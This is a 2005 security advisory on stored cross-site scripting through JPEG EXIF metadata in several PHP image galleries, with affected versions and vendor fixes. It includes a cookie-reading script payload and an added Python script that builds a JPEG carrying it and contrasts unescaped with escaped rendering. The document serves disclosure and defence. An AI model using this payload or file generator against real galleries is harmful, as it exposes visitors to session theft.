Monday, September 05, 2005

[UNIX] PHP Images Galleries EXIF Metadata XSS Multiple Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

PHP Images Galleries EXIF Metadata XSS Multiple Vulnerabilities
------------------------------------------------------------------------

SUMMARY

Most PHP-based image galleries now parse the Exchangeable Image File (EXIF)
metadata of JPEG files. EXIF is an international specification that lets
camera and imaging vendors encode metadata in the application segments
(APP1) of a JPEG file: camera make and model, software, image description,
user comments and similar free-text fields. Unfortunately, several galleries
display these EXIF fields without sanitizing them, so whoever controls the
uploaded file controls text that is written straight into the gallery's
HTML.

DETAILS

Vulnerable Systems:
* Coppermine version 1.3.3 and prior
* Gallery version 1.5.1-RC2 and prior
* phpGraphy version 0.9.9a and prior
* YaPig version 0.95 and prior

Immune Systems:
* Coppermine version 1.4.1
* phpGraphy version 0.9.10

Placing malicious content in the EXIF section of a JPEG image allows an
attacker to perform a stored cross-site scripting attack against every
visitor of the page on which an affected PHP gallery displays that image's
metadata.

Proof of Concept:
Take a .JPG file, edit its EXIF section and replace the content of one of
its text fields with
<script>alert(document.cookie)</script>
then upload the image to an on-line gallery and make the gallery display
the image (and its metadata).
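The following Python script is an added example, not part of the original advisory and not code from any of the galleries listed above. It shows the whole chain the summary and the proof of concept describe: it builds a minimal JPEG whose Exif APP1 segment carries the payload in the ImageDescription tag (0x010E), parses the segment back the way a gallery's EXIF reader would, and renders the metadata twice, once by raw string interpolation (the vulnerable pattern) and once HTML-escaped (the fix the vendors shipped). The choice of tag, the helper names and the sample "ACME"/"X1" values are assumptions made for the demonstration; the generated file contains no image data, only the metadata container.

```python
# Added example, not code from the advisory or from any gallery it names.
# Builds a JPEG with a crafted Exif APP1 segment, parses it back the way a
# gallery's EXIF reader would, and renders the metadata unsafely and safely.
import html
import struct

SOI, EOI, APP1 = b"\xff\xd8", b"\xff\xd9", b"\xff\xe1"
EXIF_HEADER = b"Exif\x00\x00"          # APP1 payload prefix that marks Exif data
TYPE_ASCII = 2                          # TIFF field type for NUL-terminated strings
TAG_NAMES = {                           # a few IFD0 string tags (TIFF 6.0 numbering)
    0x010E: "ImageDescription", 0x010F: "Make", 0x0110: "Model",
    0x0131: "Software", 0x013B: "Artist",
}
# Payload placed in ImageDescription; the tag choice is an assumption for the demo.
PAYLOAD = "<script>alert(document.cookie)</script>"


def build_exif_jpeg(tags):
    """Return a minimal JPEG (SOI, one Exif APP1 segment, EOI) whose IFD0 holds
    the given {tag_id: ascii_string} entries. Little-endian TIFF, no image data."""
    n = len(tags)
    ifd_size = 2 + 12 * n + 4                  # entry count, entries, next-IFD pointer
    data_offset = 8 + ifd_size                 # first byte after IFD0, relative to the TIFF header
    entries, data = [], b""
    for tag, value in sorted(tags.items()):    # IFD entries must be sorted by tag number
        raw = value.encode("ascii") + b"\x00"
        if len(raw) <= 4:                      # short values are stored inside the entry
            entries.append(struct.pack("<HHI4s", tag, TYPE_ASCII, len(raw), raw.ljust(4, b"\x00")))
        else:                                  # long values are stored after the IFD, by offset
            entries.append(struct.pack("<HHII", tag, TYPE_ASCII, len(raw), data_offset + len(data)))
            data += raw
    ifd0 = struct.pack("<H", n) + b"".join(entries) + struct.pack("<I", 0)
    tiff = b"II" + struct.pack("<HI", 42, 8) + ifd0 + data
    payload = EXIF_HEADER + tiff
    return SOI + APP1 + struct.pack(">H", len(payload) + 2) + payload + EOI


def parse_exif(jpeg):
    """Walk the JPEG marker segments and return {tag_name: value} for the ASCII
    tags of IFD0 in the first Exif APP1 segment ({} if there is none)."""
    if jpeg[:2] != SOI:
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos:pos + 2] != EOI:
        (length,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        body = jpeg[pos + 4:pos + 2 + length]
        if jpeg[pos:pos + 2] == APP1 and body.startswith(EXIF_HEADER):
            return _parse_ifd0(body[len(EXIF_HEADER):])
        pos += 2 + length
    return {}


def _parse_ifd0(tiff):
    """Read the ASCII entries of IFD0 from a TIFF structure (either byte order)."""
    endian = {b"II": "<", b"MM": ">"}[tiff[:2]]
    magic, ifd_offset = struct.unpack(endian + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF header")
    (n,) = struct.unpack(endian + "H", tiff[ifd_offset:ifd_offset + 2])
    meta = {}
    for i in range(n):
        off = ifd_offset + 2 + 12 * i
        tag, typ, count = struct.unpack(endian + "HHI", tiff[off:off + 8])
        if typ != TYPE_ASCII:
            continue
        if count <= 4:
            raw = tiff[off + 8:off + 8 + count]
        else:
            (voff,) = struct.unpack(endian + "I", tiff[off + 8:off + 12])
            if voff + count > len(tiff):       # refuse offsets that point outside the segment
                raise ValueError("EXIF value offset out of range")
            raw = tiff[voff:voff + count]
        meta[TAG_NAMES.get(tag, "0x%04X" % tag)] = raw.rstrip(b"\x00").decode("latin-1")
    return meta


def render_unsafe(meta):
    """The vulnerable pattern: raw EXIF strings interpolated into the page."""
    return "".join("<tr><td>%s</td><td>%s</td></tr>" % (k, v) for k, v in meta.items())


def render_safe(meta):
    """The fix: escape every value at output time (PHP: htmlspecialchars($v, ENT_QUOTES))."""
    return "".join("<tr><td>%s</td><td>%s</td></tr>" % (html.escape(k), html.escape(v))
                   for k, v in meta.items())


def demo():
    """Build the crafted file, read it back, and return both renderings."""
    jpeg = build_exif_jpeg({0x010E: PAYLOAD, 0x010F: "ACME", 0x0110: "X1"})  # constructed sample
    meta = parse_exif(jpeg)
    return meta, render_unsafe(meta), render_safe(meta)


if __name__ == "__main__":
    meta, unsafe, safe = demo()
    print(meta)
    print("vulnerable:", unsafe)
    print("escaped:   ", safe)
```

The point of the second renderer is that the escaping happens where the string meets HTML, not on upload: EXIF has many string-valued tags (Make, Model, Software, Artist, UserComment, the vendor MakerNote), a filter that only checks one of them is bypassed with the next, and tools that re-encode an image commonly carry the metadata over unchanged. Stripping metadata from uploads removes this vector entirely, but a gallery still has to escape anything it stores and later displays.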

Vendor Status:
The information was provided to the project managers of all affected
galleries on the 17th of August 2005.

* Coppermine
Update to Coppermine 1.3.4
http://coppermine-gallery.net/forum/index.php?topic=20933.0

* Gallery
Update to the final release of Gallery 1.5.1.
http://gallery.menalto.com/modules.php?op=modload&name=phpWiki&file=index&pagename=Download
A patch for Gallery 1.5 and an updated Debian package of Gallery 1.2.5 have
been released too.

* phpGraphy
Update to version 0.9.10
http://phpgraphy.sourceforge.net/download.php

* YaPig
No answer up to now.

* PhotoPost PHP Pro
On the 22nd of August: "we'll be issuing an update to PhotoPost today
which will sanitize this data before being displayed"

ADDITIONAL INFORMATION

The information has been provided by Cedric Cochin
<cedric.cochin@gmail.com>.
The original article can be found at:
http://cedri.cc/advisories/EXIF_XSS.txt
